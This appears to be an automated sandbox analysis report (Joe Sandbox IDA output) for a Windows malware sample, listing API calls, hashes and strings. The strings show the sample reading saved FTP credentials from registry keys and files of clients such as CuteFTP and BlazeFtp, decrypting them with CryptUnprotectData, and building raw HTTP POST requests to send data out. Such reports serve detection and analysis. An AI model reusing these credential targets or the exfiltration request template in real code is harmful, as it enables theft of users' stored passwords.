                                                • Opcode Fuzzy Hash: 8037f23a873e77a0f6edddb421db5ffbe9abf7f49fb2db230b895b2aee70f783
                                                • Instruction Fuzzy Hash: C251C431800118FADF216F61CC42BDD7AB9BF44308F50C1BAB549741B1DBBA5BA1AF99
                                                APIs
                                                  • Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5
                                                • InternetCrackUrlA.WININET(?,00000000,80000000,0000003C), ref: 00403C99
                                                • InternetCreateUrlA.WININET(0000003C,80000000,?,00000FFF), ref: 00403CC4
                                                • InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 00403D0A
                                                • wsprintfA.USER32 ref: 00403D2F
                                                  • Part of subcall function 00403BF8: setsockopt.WSOCK32(?,0000FFFF,00000080,00000001,00000004), ref: 00403C1D
                                                • lstrlenA.KERNEL32(?,00001000,00001000,00001000), ref: 00403D5A
                                                • closesocket.WSOCK32(?,?,00001000,00001000,00001000), ref: 00403DA5
                                                Strings
                                                • <, xrefs: 00403CE4
                                                • POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Content-Length: %luConnection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98), xrefs: 00403D27
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Internet$Crack$AllocCreateLocalclosesocketlstrlensetsockoptwsprintf
                                                • String ID: <$POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Content-Length: %luConnection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                                                • API String ID: 2761384797-2005047030
                                                • Opcode ID: b053dbc70a52213ddd447e7c13b0c42c6f570c480b6c7b3ac6f92ea3c1945e54
                                                • Instruction ID: fe07db4af8dd94df17ee6c720c547efa6b0131b555141efaa36af9fbc2ff82a2
                                                • Opcode Fuzzy Hash: b053dbc70a52213ddd447e7c13b0c42c6f570c480b6c7b3ac6f92ea3c1945e54
                                                • Instruction Fuzzy Hash: 93410731D00209EBEF11AFD1CC41BEEBE79AF44349F10843AF510B52A1D7B95A55DB19
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?), ref: 00405DA3
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405DD7
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00405F83
                                                  • Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumFreeLocalOpen
                                                • String ID: HostAdrs$Password$Port$RemoteDir$UserName
                                                • API String ID: 3369285772-3748300950
                                                • Opcode ID: 14361c1874bff10c4c9838cde4c76cab8e6f021362150fd43372c907ae6ab6a3
                                                • Instruction ID: 2eea4d456f73d42d52b348fa92dc40ddc9746dda4a12fc41e63022af70a36ae2
                                                • Opcode Fuzzy Hash: 14361c1874bff10c4c9838cde4c76cab8e6f021362150fd43372c907ae6ab6a3
                                                • Instruction Fuzzy Hash: 5A41E67190011CFADF216B61CC42BDE7AB9BF44304F50C0BAB588741B1DB7A5B91AF98
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040D838
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040D86C
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040DA00
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: HostName$Password$PortNumber$TerminalType$UserName
                                                • API String ID: 1332880857-1017491782
                                                • Opcode ID: 633d87b1d0210967937b8ea46313bb2e639d936a2d24a0312f2885e8257566cc
                                                • Instruction ID: 971e5b3844e2a4190a23d4486ec320f40f1845a70572575ff90aef2106704998
                                                • Opcode Fuzzy Hash: 633d87b1d0210967937b8ea46313bb2e639d936a2d24a0312f2885e8257566cc
                                                • Instruction Fuzzy Hash: 64419471800118FADF616F51CC42BDD7AB6BF04304F5081BAB548741B1DB7A9BA5AFC8
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 004071F4
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407228
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004073BA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: FtpDirectory$FtpPassword$FtpServer$FtpUserName$_FtpPassword
                                                • API String ID: 1332880857-980612798
                                                • Opcode ID: 80c70e74b41c669a5f6cff5d7adfe5ed64f5d960890017647973077786b2b2b9
                                                • Instruction ID: 6a640fb53117900caefd170e7f704ebfcd01eb9f748b4f932ba6877f7caabf76
                                                • Opcode Fuzzy Hash: 80c70e74b41c669a5f6cff5d7adfe5ed64f5d960890017647973077786b2b2b9
                                                • Instruction Fuzzy Hash: 1A41A23184011CBADF216B51CC42FDD7ABABF04304F54C1BAB948741B1DBBA6B91AF99
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00406FC9
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00406FFD
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040718F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: Directory$Password$Server$UserName$_Password
                                                • API String ID: 1332880857-3317168126
                                                • Opcode ID: da109ab49e87ccf9e7003299793fa87cfc5bd20cd33f3d4bf7c3dad87cb79719
                                                • Instruction ID: a357f4283968390ce9a36961c27009d3f56b5993c4b20a818c8f4fb79495d9c5
                                                • Opcode Fuzzy Hash: da109ab49e87ccf9e7003299793fa87cfc5bd20cd33f3d4bf7c3dad87cb79719
                                                • Instruction Fuzzy Hash: 9F41B63194011CBADF216F51CC42BDD7ABABF04344F50C1BAB548781B1DBBA5B91AF89
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?), ref: 0040603B
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040606F
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406204
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: HostDirName$HostName$Password$Port$Username
                                                • API String ID: 1332880857-791697221
                                                • Opcode ID: 2fd3a250acc75e91b7d50f7b2ecb30895178a3a2d7c6fc6c9eca39d1d43210bf
                                                • Instruction ID: 92c87779d6e83c18bad15a4107186905ebe0c89097d428790371e3a1127e341d
                                                • Opcode Fuzzy Hash: 2fd3a250acc75e91b7d50f7b2ecb30895178a3a2d7c6fc6c9eca39d1d43210bf
                                                • Instruction Fuzzy Hash: C041C43184011CBADF216B61CD42BDD7ABABF44304F50C1BAB549740B1DBBA5BA1AF88
                                                APIs
                                                  • Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5
                                                • InternetCrackUrlA.WININET(?,00000000,80000000,0000003C), ref: 00403AAC
                                                • InternetCreateUrlA.WININET(0000003C,80000000,?,00001FFF), ref: 00403AD7
                                                • InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 00403B1D
                                                • wsprintfA.USER32 ref: 00403B3C
                                                • lstrlenA.KERNEL32(?,00002000,00002000), ref: 00403B5F
                                                • closesocket.WSOCK32(?,?,00002000,00002000), ref: 00403B89
                                                Strings
                                                • <, xrefs: 00403AF7
                                                • GET %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98), xrefs: 00403B34
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Internet$Crack$AllocCreateLocalclosesocketlstrlenwsprintf
                                                • String ID: <$GET %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                                                • API String ID: 4072649068-555445111
                                                • Opcode ID: d60a0399014c81d479f1bf6e8654dda4f2a395ae147f4dd14fe526620edc93ee
                                                • Instruction ID: 5dad31a296ee1e474bb90fa989d9bf74c8b3c06fe6408c1587e28e125fac8998
                                                • Opcode Fuzzy Hash: d60a0399014c81d479f1bf6e8654dda4f2a395ae147f4dd14fe526620edc93ee
                                                • Instruction Fuzzy Hash: C041E871D00209EAEF11AFA1CC41FEDBEBAEF04349F10413AF500B52A1D7B96A52DB59
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?), ref: 0040D401
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040D435
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040D5B8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: Host$Pass$Port$Remote Dir$User
                                                • API String ID: 1332880857-1775099961
                                                • Opcode ID: adb44f60b2537b44978af1d702f16a5e9d64284102b915f63713a2386231933b
                                                • Instruction ID: 826acad57edaa0bf4c2fa88e94753e9669362c91b49d7790f3552c75a3286d91
                                                • Opcode Fuzzy Hash: adb44f60b2537b44978af1d702f16a5e9d64284102b915f63713a2386231933b
                                                • Instruction Fuzzy Hash: 2B41C471840118BADF226F61CD42FDD7AB6BF04308F50C1BAB548740B1DB7A5B91AF98
                                                APIs
                                                • StrStrIA.SHLWAPI(0084DAA8,BlazeFtp), ref: 0040C675
                                                  • Part of subcall function 00402272: lstrlenA.KERNEL32(?), ref: 00402286
                                                  • Part of subcall function 00402272: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 004022A5
                                                  • Part of subcall function 00402272: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004022B7
                                                  • Part of subcall function 00402272: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004022C9
                                                  • Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$FreeLocal
                                                • String ID: BlazeFtp$LastAddress$LastPassword$LastPort$LastUser$Software\FlashPeak\BlazeFtp\Settings$\BlazeFtp$site.dat
                                                • API String ID: 1884169789-2976447346
                                                • Opcode ID: 07c908085ae0a3b1dd2a0e79e3ba6bee56b4ce9844fc876ef30fd9faf67731fa
                                                • Instruction ID: 9788eed68af0fdd9333d675305e002c21cac9e36ea6adcdc8056509605193707
                                                • Opcode Fuzzy Hash: 07c908085ae0a3b1dd2a0e79e3ba6bee56b4ce9844fc876ef30fd9faf67731fa
                                                • Instruction Fuzzy Hash: 82310931940109BADF126FA1CC82FEE7A72AF41748F60413BB510751F1DBBE9A919B4C
                                                APIs
                                                • StrStrIA.SHLWAPI(0084DAA8,CUTEFTP), ref: 0040522B
                                                  • Part of subcall function 00402272: lstrlenA.KERNEL32(?), ref: 00402286
                                                  • Part of subcall function 00402272: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 004022A5
                                                  • Part of subcall function 00402272: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 004022B7
                                                  • Part of subcall function 00402272: lstrlenA.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 004022C9
                                                  • Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC
                                                Strings
                                                • Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar, xrefs: 00405295
                                                • Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar, xrefs: 004052C9
                                                • Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar, xrefs: 004052BC
                                                • \sm.dat, xrefs: 0040523F
                                                • Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar, xrefs: 004052A2
                                                • CUTEFTP, xrefs: 00405225
                                                • Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar, xrefs: 004052AF
                                                • Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar, xrefs: 00405288
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$FreeLocal
                                                • String ID: CUTEFTP$Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar$Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar$\sm.dat
                                                • API String ID: 1884169789-2738976122
                                                • Opcode ID: e10679da0e968ae51e2c90e9b0e9e9967d907165e8569cbaf05ea9d011917a38
                                                • Instruction ID: 5ef3d90ed464d92e4ce4a3c155051f2a51152499df9d1fdfddb0812c96e0ae3a
                                                • Opcode Fuzzy Hash: e10679da0e968ae51e2c90e9b0e9e9967d907165e8569cbaf05ea9d011917a38
                                                • Instruction Fuzzy Hash: C5115E71644509BADF113F21CC02FDE3E22AF94784F10403ABA05791E2DBBD8AA19E4C
                                                APIs
                                                  • Part of subcall function 004018B7: LocalAlloc.KERNEL32(00000040,00402272,?,004022F2,?), ref: 004018C5
                                                • StrStrIA.SHLWAPI(?,Content-Length:), ref: 00403941
                                                • lstrlenA.KERNEL32(Content-Length:,00000000,?,Content-Length:), ref: 00403952
                                                • StrToIntA.SHLWAPI(00000001,00000001,00000000,Content-Length:,00000000,?,Content-Length:), ref: 00403973
                                                • StrStrIA.SHLWAPI(?,Location:,?,Content-Length:), ref: 0040398A
                                                • lstrlenA.KERNEL32(Location:,00000000,?,Location:,?,Content-Length:), ref: 0040399B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$AllocLocal
                                                • String ID: Content-Length:$Location:
                                                • API String ID: 2140729754-2400408565
                                                • Opcode ID: d8122c238ad3931d07f7d45422bcd0d6ba05ce70cd545abab15ebe5caa2b8043
                                                • Instruction ID: 53c0aedc88992e642676fe9e6f7d5ee89e7a3e391c4de06073f3904886dd738f
                                                • Opcode Fuzzy Hash: d8122c238ad3931d07f7d45422bcd0d6ba05ce70cd545abab15ebe5caa2b8043
                                                • Instruction Fuzzy Hash: C841B435F00149BBDB10AFA5DC41B9EFF69EF81308F208177B410B62E1DBB98A519B58
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?), ref: 00406B9F
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406BD3
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406D74
                                                  • Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumFreeLocalOpen
                                                • String ID: Hostname$Password$Port$Username
                                                • API String ID: 3369285772-1811172798
                                                • Opcode ID: 36d22202374298f3ff259b9d53ff544a628b235b0e540339258e70ff1ed1119d
                                                • Instruction ID: 99001fdd8753383694019c6dd6a93260e170fc207c11c2d7306dae9c04af7e76
                                                • Opcode Fuzzy Hash: 36d22202374298f3ff259b9d53ff544a628b235b0e540339258e70ff1ed1119d
                                                • Instruction Fuzzy Hash: 7B41077194011CFADF21AB61CC42BDD7AB9BF04344F54C0BAB189740B1DB7A5BA19F98
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?), ref: 0040696B
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040699F
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406B14
                                                  • Part of subcall function 004018A0: LocalFree.KERNEL32(00000000,?,00402319,?,?,?,?,?,?), ref: 004018AC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumFreeLocalOpen
                                                • String ID: FtpPort$Password$Server$Username
                                                • API String ID: 3369285772-1828875246
                                                • Opcode ID: 819fc5c6edb7c21088c55d04b07920460cbc523b03429d021ac959f3d17d89b0
                                                • Instruction ID: 35153dfd5480a7f2773a935d7fa12b4e763ec81b3f01874c9c19303a63a540c2
                                                • Opcode Fuzzy Hash: 819fc5c6edb7c21088c55d04b07920460cbc523b03429d021ac959f3d17d89b0
                                                • Instruction Fuzzy Hash: F541F67190011CBADF217B61CC42BDD7AB9BF44304F50C1BAB149740B1DABA5BA19F98
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E072
                                                • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?,?,?), ref: 0040E1A2
                                                  • Part of subcall function 0040421D: CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 00404269
                                                  • Part of subcall function 0040421D: LocalFree.KERNEL32(00000000), ref: 0040429D
                                                  • Part of subcall function 004015B3: lstrlenA.KERNEL32(00000000), ref: 004015BF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseCryptDataFreeLocalOpenUnprotectlstrlen
                                                • String ID: Folder$Port$Site$UserID$xflags
                                                • API String ID: 2167297517-269738940
                                                • Opcode ID: 628222a205af700e1dfa5e459dd2762fba81473f5a09891019813ca48e3e76f8
                                                • Instruction ID: acf25d5f465c55af7625b09366b2c78d2ad704e718143cf7d072450bde636533
                                                • Opcode Fuzzy Hash: 628222a205af700e1dfa5e459dd2762fba81473f5a09891019813ca48e3e76f8
                                                • Instruction Fuzzy Hash: 7831A235800109BADF126F92CC42FEE7B76AF04704F50853BB554781F1D7BA9AA1EB48
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00407715
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407749
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407864
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: DataDir$InstallPath$sites.dat$sites.ini
                                                • API String ID: 1332880857-3870687875
                                                • Opcode ID: a177c6cfb3178f946141ffd0db5cdd65dca207f9c3fb13970eb39b1fee972048
                                                • Instruction ID: bd6502dbd2f434c65abe7692706a4c0e090c52a5a12b12d90e4d834c171b6782
                                                • Opcode Fuzzy Hash: a177c6cfb3178f946141ffd0db5cdd65dca207f9c3fb13970eb39b1fee972048
                                                • Instruction Fuzzy Hash: 2331053184021CFADF216F51CC46BDD7ABABF40344F50C4BAB248751A1DBB96AD19F89
                                                APIs
                                                • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040F678
                                                  • Part of subcall function 00409A76: StrStrIA.SHLWAPI(?,?), ref: 00409A82
                                                  • Part of subcall function 00409A76: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409AF9
                                                  • Part of subcall function 00409A76: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B25
                                                  • Part of subcall function 00409A76: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409B6D
                                                • SetCurrentDirectoryA.KERNEL32(?,?), ref: 0040F6BD
                                                • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?), ref: 0040F6D8
                                                • SetCurrentDirectoryA.KERNEL32(?,?,?,?), ref: 0040F71D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2922461256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2922449353.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922477484.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2922489660.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_8WgZHDQckx.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CurrentDirectory$CloseEnumOpen
